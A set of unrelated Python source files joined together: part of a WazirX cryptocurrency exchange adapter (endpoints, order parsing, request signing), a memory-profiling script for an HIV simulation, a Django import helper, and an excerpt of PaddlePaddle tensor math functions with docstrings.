'fetchBalance': True,
'fetchBidsAsks': False,
'fetchClosedOrders': False,
'fetchDepositAddress': False,
'fetchDeposits': True,
'fetchFundingFees': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRates': False,
'fetchMarkets': True,
'fetchMyTrades': False,
'fetchOHLCV': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrders': True,
'fetchOrderBook': True,
'fetchPositions': False,
'fetchStatus': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTradingFee': False,
'fetchTradingFees': False,
'fetchTransactions': False,
'fetchWithdrawals': False,
'setLeverage': False,
'withdraw': False,
'fetchDepositAddressesByNetwork': False,
'transfer': False,
'fetchTransfers': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/148647666-c109c20b-f8ac-472f-91c3-5f658cb90f49.jpeg',
'api': 'https://api.wazirx.com/sapi/v1',
'www': 'https://wazirx.com',
'doc': 'https://docs.wazirx.com/#public-rest-api-for-wazirx',
'fees': 'https://wazirx.com/fees',
},
'api': {
'public': {
'get': {
'exchangeInfo': 1,
'depth': 1,
'ping': 1,
'systemStatus': 1,
'tickers/24hr': 1,
'ticker/24hr': 1,
'time': 1,
'trades': 1,
},
},
'private': {
'get': {
'account': 1,
'allOrders': 1,
'funds': 1,
'historicalTrades': 1,
'openOrders': 1,
'order': 1,
},
'post': {
'order': 1,
'order/test': 1,
},
'delete': {
'order': 1,
'openOrders': 1,
},
},
},
'fees': {
'WRX': {'maker': self.parse_number('0.0'), 'taker': self.parse_number('0.0')},
},
'exceptions': {
'exact': {
'-1121': BadSymbol, # {"code": -1121, "message": "Invalid symbol."}
'1999': BadRequest, # {"code":1999,"message":"symbol is missing, symbol does not have a valid value"} message varies depending on the error
'2002': InsufficientFunds, # {"code":2002,"message":"Not enough USDT balance to execute self order"}
'2005': BadRequest, # {"code":2005,"message":"Signature is incorrect."}
'2078': PermissionDenied, # {"code":2078,"message":"Permission denied."}
'2098': BadRequest, # {"code":2098,"message":"Request out of receiving window."}
'2031': InvalidOrder, # {"code":2031,"message":"Minimum buy amount must be worth 2.0 USDT"}
'2113': BadRequest, # {"code":2113,"message":"RecvWindow must be in range 1..60000"}
'2115': BadRequest, # {"code":2115,"message":"Signature not found."}
'2136': RateLimitExceeded, # {"code":2136,"message":"Too many api request"}
'94001': InvalidOrder, # {"code":94001,"message":"Stop price not found."}
},
},
'options': {
# 'fetchTradesMethod': 'privateGetHistoricalTrades',
'recvWindow': 10000,
},
})
def fetch_markets(self, params={}):
response = self.publicGetExchangeInfo(params)
#
# {
# "timezone":"UTC",
# "serverTime":1641336850932,
# "symbols":[
# {
# "symbol":"btcinr",
# "status":"trading",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "baseAssetPrecision":5,
# "quoteAssetPrecision":0,
# "orderTypes":[
# "limit",
# "stop_limit"
# ],
# "isSpotTradingAllowed":true,
# "filters":[
# {
# "filterType":"PRICE_FILTER",
# "minPrice":"1",
# "tickSize":"1"
# }
# ]
# },
#
markets = self.safe_value(response, 'symbols', [])
result = []
for i in range(0, len(markets)):
entry = markets[i]
id = self.safe_string(entry, 'symbol')
baseId = self.safe_string(entry, 'baseAsset')
quoteId = self.safe_string(entry, 'quoteAsset')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
isSpot = self.safe_value(entry, 'isSpotTradingAllowed')
filters = self.safe_value(entry, 'filters')
minPrice = None
for j in range(0, len(filters)):
filter = filters[j]
filterType = self.safe_string(filter, 'filterType')
if filterType == 'PRICE_FILTER':
minPrice = self.safe_number(filter, 'minPrice')
fee = self.safe_value(self.fees, quote, {})
takerString = self.safe_string(fee, 'taker', '0.2')
takerString = Precise.string_div(takerString, '100')
taker = self.parse_number(takerString)
makerString = self.safe_string(fee, 'maker', '0.2')
makerString = Precise.string_div(makerString, '100')
maker = self.parse_number(makerString)
status = self.safe_string(entry, 'status')
active = status == 'trading'
limits = {
'price': {
'min': minPrice,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
}
precision = {
'price': self.safe_integer(entry, 'quoteAssetPrecision'),
'amount': self.safe_integer(entry, 'baseAssetPrecision'),
}
result.append({
'info': entry,
'symbol': symbol,
'id': id,
'base': base,
'quote': quote,
'baseId': baseId,
'maker': maker,
'taker': taker,
'quoteId': quoteId,
'limits': limits,
'precision': precision,
'type': 'spot',
'spot': isSpot,
'active': active,
})
return result
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # [1, 5, 10, 20, 50, 100, 500, 1000]
response = self.publicGetDepth(self.extend(request, params))
#
# {
# "timestamp":1559561187,
# "asks":[
# ["8540.0","1.5"],
# ["8541.0","0.0042"]
# ],
# "bids":[
# ["8530.0","0.8814"],
# ["8524.0","1.4"]
# ]
# }
#
timestamp = self.safe_integer(response, 'timestamp')
return self.parse_order_book(response, symbol, timestamp)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
ticker = self.publicGetTicker24hr(self.extend(request, params))
#
# {
# "symbol":"wrxinr",
# "baseAsset":"wrx",
# "quoteAsset":"inr",
# "openPrice":"94.77",
# "lowPrice":"92.7",
# "highPrice":"95.17",
# "lastPrice":"94.03",
# "volume":"1118700.0",
# "bidPrice":"94.02",
# "askPrice":"94.03",
# "at":1641382455000
# }
#
return self.parse_ticker(ticker, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTickers24hr()
#
# [
# {
# "symbol":"btcinr",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "openPrice":"3698486",
# "lowPrice":"3641155.0",
# "highPrice":"3767999.0",
# "lastPrice":"3713212.0",
# "volume":"254.11582",
# "bidPrice":"3715021.0",
# "askPrice":"3715022.0",
# }
# ...
# ]
#
result = {}
for i in range(0, len(tickers)):
ticker = tickers[i]
parsedTicker = self.parse_ticker(ticker)
symbol = parsedTicker['symbol']
result[symbol] = parsedTicker
return result
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # Default 500; max 1000.
method = self.safe_string(self.options, 'fetchTradesMethod', 'publicGetTrades')
response = getattr(self, method)(self.extend(request, params))
# [
# {
# "id":322307791,
# "price":"93.7",
# "qty":"0.7",
# "quoteQty":"65.59",
# "time":1641386701000,
# "isBuyerMaker":false
# },
# ]
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# {
# "id":322307791,
# "price":"93.7",
# "qty":"0.7",
# "quoteQty":"65.59",
# "time":1641386701000,
# "isBuyerMaker":false
# }
#
id = self.safe_string(trade, 'id')
timestamp = self.parse8601(self.safe_string(trade, 'time'))
datetime = self.iso8601(timestamp)
symbol = None
if market is not None:
symbol = market['symbol']
isBuyerMaker = self.safe_value(trade, 'isBuyerMaker')
side = 'sell' if isBuyerMaker else 'buy'
price = self.safe_number(trade, 'price')
amount = self.safe_number(trade, 'qty')
cost = self.safe_number(trade, 'quoteQty')
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': datetime,
'symbol': symbol,
'order': id,
'type': None,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
})
def fetch_status(self, params={}):
response = self.publicGetSystemStatus(params)
#
# {"status":"normal","message":"System is running normally."}
#
status = self.safe_string(response, 'status')
status = 'ok' if (status == 'normal') else 'maintenance'
self.status = self.extend(self.status, {
'status': status,
'updated': self.milliseconds(),
})
return self.status
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {
# "serverTime":1635467280514
# }
#
return self.safe_integer(response, 'serverTime')
def parse_ticker(self, ticker, market=None):
#
# {
# "symbol":"btcinr",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "openPrice":"3698486",
# "lowPrice":"3641155.0",
# "highPrice":"3767999.0",
# "lastPrice":"3713212.0",
# "volume":"254.11582", # base volume
# "bidPrice":"3715021.0",
# "askPrice":"3715022.0",
# "at":1641382455000 # only on fetchTicker
# }
#
marketId = self.safe_string(ticker, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
last = self.safe_number(ticker, 'lastPrice')
open = self.safe_number(ticker, 'openPrice')
high = self.safe_number(ticker, 'highPrice')
low = self.safe_number(ticker, 'lowPrice')
baseVolume = self.safe_number(ticker, 'volume')
bid = self.safe_number(ticker, 'bidPrice')
ask = self.safe_number(ticker, 'askPrice')
timestamp = self.safe_string(ticker, 'at')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': None,
'info': ticker,
}, market)
def parse_balance(self, response):
result = {}
for i in range(0, len(response)):
balance = response[i]
id = self.safe_string(balance, 'asset')
code = self.safe_currency_code(id)
account = self.account()
account['free'] = self.safe_string(balance, 'free')
account['used'] = self.safe_string(balance, 'locked')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetFunds(params)
#
# [
# {
# "asset":"inr",
# "free":"0.0",
# "locked":"0.0"
# },
# ]
#
return self.parse_balance(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if since is not None:
request['startTime'] = since
if limit is not None:
request['limit'] = limit
response = self.privateGetAllOrders(self.extend(request, params))
# [
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "cancel",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# },
# {
# "id": 30,
# "symbol": "wrxinr",
# "price": "9293.0",
# "stopPrice": "9200.0",
# "origQty": "10.0",
# "executedQty": "0.0",
# "status": "cancel",
# "type": "stop_limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1507725176595
# }
# ]
orders = self.parse_orders(response, market, since, limit)
orders = self.filter_by(orders, 'symbol', symbol)
return orders
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
market = None
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
response = self.privateGetOpenOrders(self.extend(request, params))
# [
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "cancel",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# },
# {
# "id": 30,
# "symbol": "wrxinr",
# "price": "9293.0",
# "stopPrice": "9200.0",
# "origQty": "10.0",
# "executedQty": "0.0",
# "status": "cancel",
# "type": "stop_limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1507725176595
# }
# ]
orders = self.parse_orders(response, market, since, limit)
return orders
def cancel_all_orders(self, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelAllOrders requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
return self.privateDeleteOpenOrders(self.extend(request, params))
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'orderId': id,
}
response = self.privateDeleteOrder(self.extend(request, params))
return self.parse_order(response)
def create_order(self, symbol, type, side, amount, price=None, params={}):
if not (type == 'limit') or (type == 'stop_limit'):
raise ExchangeError(self.id + ' createOrder() supports limit and stop_limit orders only')
if price is None:
raise ExchangeError(self.id + ' createOrder() requires a price argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'side': side,
'quantity': amount,
'type': 'limit',
}
request['price'] = self.price_to_precision(symbol, price)
stopPrice = self.safe_string(params, 'stopPrice')
if stopPrice is not None:
request['type'] = 'stop_limit'
response = self.privatePostOrder(self.extend(request, params))
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "wait",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# }
return self.parse_order(response, market)
def parse_order(self, order, market=None):
# {
# "id":1949417813,
# "symbol":"ltcusdt",
# "type":"limit",
# "side":"sell",
# "status":"done",
# "price":"146.2",
# "origQty":"0.05",
# "executedQty":"0.05",
# "createdTime":1641252564000,
# "updatedTime":1641252564000
# },
created = self.safe_integer(order, 'createdTime')
updated = self.safe_integer(order, 'updatedTime')
marketId = self.safe_string(order, 'symbol')
symbol = self.safe_symbol(marketId, market)
amount = self.safe_string(order, 'quantity')
filled = self.safe_string(order, 'executedQty')
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
price = self.safe_string(order, 'price')
type = self.safe_string_lower(order, 'type')
side = self.safe_string_lower(order, 'side')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': created,
'datetime': self.iso8601(created),
'lastTradeTimestamp': updated,
'status': status,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'remaining': None,
'cost': None,
'fee': None,
'average': None,
'trades': [],
}, market)
def parse_order_status(self, status):
statuses = {
'wait': 'open',
'done': 'closed',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
if api == 'private':
self.check_required_credentials()
timestamp = self.milliseconds()
data = self.extend({'recvWindow': self.options['recvWindow'], 'timestamp': timestamp}, params)
data = self.keysort(data)
signature = self.hmac(self.encode(self.urlencode(data)), self.encode(self.secret), hashlib.sha256)
url += '?' + self.urlencode(data)
url += '&signature=' + signature
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Api-Key': self.apiKey,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
#
# {"code":2098,"message":"Request out of receiving window."}
#
if response is None:
return
errorCode = self.safe_string(response, 'code')
if errorCode is not None:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
raise ExchangeError(feedback)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 23 14:16:27 2013
@author: Lucio
Program for assessing the memory footprint of the simulation. Needs the
memory_profiler module (installed on the milano cluster).
"""
import os
import time
import sys
import simpactpurple
from memory_profiler import profile
@profile
def run_single(pop):
s = simpactpurple.Community()
s.INITIAL_POPULATION = pop
#Simulate a run of the simulation
s.start() # initialize data structures
#a few timesteps
s.update_recruiting(s.RECRUIT_INITIAL)
for i in range(s.RECRUIT_WARM_UP):
s.time = i
s.time_operator.step() # 1. Time progresses
s.relationship_operator.step() # 2. Form and dissolve relationships
s.infection_operator.step() # 3. HIV transmission
s.update_recruiting(s.RECRUIT_RATE)
for i in range(s.RECRUIT_WARM_UP, int(s.NUMBER_OF_YEARS*52)):
s.time = i
s.time_operator.step() # 1. Time progresses
s.relationship_operator.step() # 2. Form and dissolve relationships
s.infection_operator.step() # 3. HIV transmission
#post-process / clean-up
for pipe in s.pipes.values():
pipe.send("terminate")
if __name__ == '__main__':
run_single(int(sys.argv[1]))
|
# -*- coding: utf-8 -*-
try:
import django
except ImportError as e:
django = None
django_import_error = e
def check_django_import():
if django is None:
raise django_import_error
class django_required(object):
def __call__(self, func):
def wrapper(self, *args, **kwargs):
check_django_import()
return func(self, *args, **kwargs)
return wrapper
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
math functions
"""
from __future__ import print_function
import numpy as np
from paddle.common_ops_import import VarDesc
from paddle.common_ops_import import dygraph_only
from paddle.common_ops_import import OpProtoHolder
from paddle.common_ops_import import templatedoc
from paddle.common_ops_import import dygraph_utils
from paddle.tensor import cast
from paddle.tensor.attribute import _complex_to_real_dtype
import paddle
from ..fluid import layers
from ..fluid.framework import core, _varbase_creator, in_dygraph_mode, Variable, convert_np_dtype_to_dtype_
from ..fluid.layer_helper import LayerHelper
from ..fluid.data_feeder import check_variable_and_dtype, check_type, check_dtype, convert_dtype
from ..fluid.layers.layer_function_generator import _generate_doc_string_, generate_activation_fn, generate_layer_fn
from ..fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
# TODO: define math functions
# yapf: disable
from ..fluid.layers import abs # noqa: F401
from ..fluid.layers import acos # noqa: F401
from ..fluid.layers import asin # noqa: F401
from ..fluid.layers import ceil # noqa: F401
from ..fluid.layers import ceil_ # noqa: F401
from ..fluid.layers import cos # noqa: F401
from ..fluid.layers import tan # noqa: F401
from ..fluid.layers import sinh # noqa: F401
from ..fluid.layers import cosh # noqa: F401
from ..fluid.layers import exp # noqa: F401
from ..fluid.layers import exp_ # noqa: F401
from ..fluid.layers import expm1 # noqa: F401
from ..fluid.layers import floor # noqa: F401
from ..fluid.layers import floor_ # noqa: F401
from ..fluid.layers import log # noqa: F401
from ..fluid.layers import reciprocal # noqa: F401
from ..fluid.layers import reciprocal_ # noqa: F401
from ..fluid.layers import round # noqa: F401
from ..fluid.layers import round_ # noqa: F401
from ..fluid.layers import rsqrt # noqa: F401
from ..fluid.layers import rsqrt_ # noqa: F401
from ..fluid.layers import scale # noqa: F401
from ..fluid.layers import square # noqa: F401
from ..fluid.layers import stanh # noqa: F401
from ..fluid.layers import atan # noqa: F401
from ..fluid.layers import erf # noqa: F401
from ..fluid.layers import sqrt # noqa: F401
from ..fluid.layers import sqrt_ # noqa: F401
from ..fluid.layers import sin # noqa: F401
from ..fluid.layers import lgamma # noqa: F401
from ..fluid.layers import multiplex # noqa: F401
from ..fluid import layers
from paddle import _C_ops
__all__ = []
_supported_int_dtype_ = [
VarDesc.VarType.UINT8,
VarDesc.VarType.INT8,
VarDesc.VarType.INT16,
VarDesc.VarType.INT32,
VarDesc.VarType.INT64,
]
_supported_float_dtype_ = [
VarDesc.VarType.FP32,
VarDesc.VarType.FP64,
]
@inplace_apis_in_dygraph_only
def scale_(x, scale=1.0, bias=0.0, bias_after_scale=True, act=None, name=None):
"""
Inplace version of ``scale`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_scale`.
"""
_scale = scale.numpy().item(0) if isinstance(scale, Variable) else scale
return _C_ops.scale_(x, 'scale',
float(_scale), 'bias',
float(bias), 'bias_after_scale', bias_after_scale)
def pow(x, y, name=None):
"""
Compute the power of tensor elements. The equation is:
.. math::
out = x^{y}
**Note**:
``paddle.pow`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32 or int64.
y (float|int|Tensor): If it is an N-D Tensor, its data type should be the same as `x`.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. Its dimension and data type are the same as `x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 2, 3], dtype='float32')
# example 1: y is a float or int
res = paddle.pow(x, 2)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1., 4., 9.])
res = paddle.pow(x, 2.5)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1. , 5.65685415 , 15.58845711])
# example 2: y is a Tensor
y = paddle.to_tensor([2], dtype='float32')
res = paddle.pow(x, y)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1., 4., 9.])
"""
# in dynamic graph mode
if in_dygraph_mode():
if isinstance(y, (int, float)):
return _C_ops.pow(x, 'factor', y)
elif isinstance(y, (paddle.Tensor, Variable)):
return _elementwise_op_in_dygraph(
x, y, axis=-1, act=None, op_name='elementwise_pow')
else:
raise TypeError('y must be scalar or tensor type, but received: %s '% (y.dtype))
# in static graph mode
else:
if isinstance(y, (int, float)):
helper = LayerHelper('pow', **locals())
inputs = {'X': x}
attrs = {'factor': y}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='pow', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
elif isinstance(y, (paddle.Tensor, Variable)):
# TODO A potential speed improvement is supporting different types in C++ and removing the cast ops here
helper = LayerHelper('elementwise_pow', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
return _elementwise_op(LayerHelper('elementwise_pow', **locals()))
else:
raise TypeError('y must be scalar or tensor type, but received: %s '% (type(y)))
@dygraph_only
def _elementwise_op_in_dygraph(x,
y,
axis=-1,
act=None,
use_mkldnn=False,
op_name=None):
op = getattr(_C_ops, op_name)
out = op(x, y, 'axis', axis, 'use_mkldnn', use_mkldnn)
return dygraph_utils._append_activation_in_dygraph(
out, act, use_mkldnn=use_mkldnn)
def _elementwise_op(helper):
op_type = helper.layer_type
original_op_type = helper.kwargs.get('original_op_type', op_type)
x = helper.kwargs.get('x', None)
y = helper.kwargs.get('y', None)
out = helper.kwargs.get('out', None)
assert x is not None, 'x cannot be None in {}'.format(original_op_type)
assert y is not None, 'y cannot be None in {}'.format(original_op_type)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
original_op_type)
check_variable_and_dtype(
y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
original_op_type)
axis = helper.kwargs.get('axis', -1)
use_mkldnn = helper.kwargs.get('use_mkldnn', False)
name = helper.kwargs.get('name', None)
if out is None:
if name is None:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
else:
out = helper.create_variable(name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type=op_type,
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'axis': axis,
'use_mkldnn': use_mkldnn})
return helper.append_activation(out)
def add(x, y, name=None):
"""
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 4], 'float64')
y = paddle.to_tensor([1, 5, 2], 'float64')
z = paddle.add(x, y)
print(z) # [3., 8., 6. ]
"""
if in_dygraph_mode():
return _C_ops.elementwise_add(x, y)
return _elementwise_op(LayerHelper('elementwise_add', **locals()))
@inplace_apis_in_dygraph_only
def add_(x, y, name=None):
"""
Inplace version of ``add`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_add`.
"""
op_type = 'elementwise_add_'
axis = -1
out_shape = broadcast_shape(x.shape, y.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
out = _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return out
def subtract(x, y, name=None):
"""
Substract two tensors element-wise. The equation is:
.. math::
out = x - y
**Note**:
``paddle.subtract`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
y (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[5, 6], [3, 4]])
res = paddle.subtract(x, y)
print(res)
# [[-4, -4],
# [4, 4]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([1, 0, 4])
res = paddle.subtract(x, y)
print(res)
# [[[ 0, 2, -1],
# [ 0, 2, -1]]]
x = paddle.to_tensor([2, np.nan, 5], dtype='float32')
y = paddle.to_tensor([1, 4, np.nan], dtype='float32')
res = paddle.subtract(x, y)
print(res)
# [ 1., nan, nan]
x = paddle.to_tensor([5, np.inf, -np.inf], dtype='float64')
y = paddle.to_tensor([1, 4, 5], dtype='float64')
res = paddle.subtract(x, y)
print(res)
# [ 4., inf., -inf.]
"""
op_type = 'elementwise_sub'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
@inplace_apis_in_dygraph_only
def subtract_(x, y, name=None):
"""
Inplace version of ``subtract`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_subtract`.
"""
axis = -1
act = None
out_shape = broadcast_shape(x.shape, y.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
out = _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_sub_')
return out
def divide(x, y, name=None):
"""
Divide two tensors element-wise. The equation is:
.. math::
out = x / y
**Note**:
``paddle.divide`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
y (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 4], dtype='float64')
y = paddle.to_tensor([1, 5, 2], dtype='float64')
z = paddle.divide(x, y)
print(z) # [2., 0.6, 2.]
"""
op_type = 'elementwise_div'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def floor_divide(x, y, name=None):
"""
Floor divide two tensors element-wise. The equation is:
.. math::
out = x // y
**Note**:
``paddle.floor_divide`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be int32, int64.
y (Tensor): the input tensor, it's data type should be int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. It's dimension equals with $x$.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 8, 7])
y = paddle.to_tensor([1, 5, 3, 3])
z = paddle.floor_divide(x, y)
print(z) # [2, 0, 2, 2]
"""
op_type = 'elementwise_floordiv'
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def remainder(x, y, name=None):
r"""
Mod two tensors element-wise. The equation is:
.. math::
out = x \% y
**Note**:
``paddle.remainder`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
y (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 8, 7])
y = paddle.to_tensor([1, 5, 3, 3])
z = paddle.remainder(x, y)
print(z) # [0, 3, 2, 1]
"""
op_type = 'elementwise_mod'
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
mod = remainder # noqa: F841
floor_mod = remainder # noqa: F841
def multiply(x, y, name=None):
"""
multiply two tensors element-wise. The equation is:
.. math::
out = x * y
**Note**:
``paddle.multiply`` supports broadcasting. If you would like to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, its data type should be one of float32, float64, int32, int64, bool.
y (Tensor): the input tensor, its data type should be one of float32, float64, int32, int64, bool.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2], [3, 4]])
y = paddle.to_tensor([[5, 6], [7, 8]])
res = paddle.multiply(x, y)
print(res) # [[5, 12], [21, 32]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([2])
res = paddle.multiply(x, y)
print(res) # [[[2, 4, 6], [2, 4, 6]]]
"""
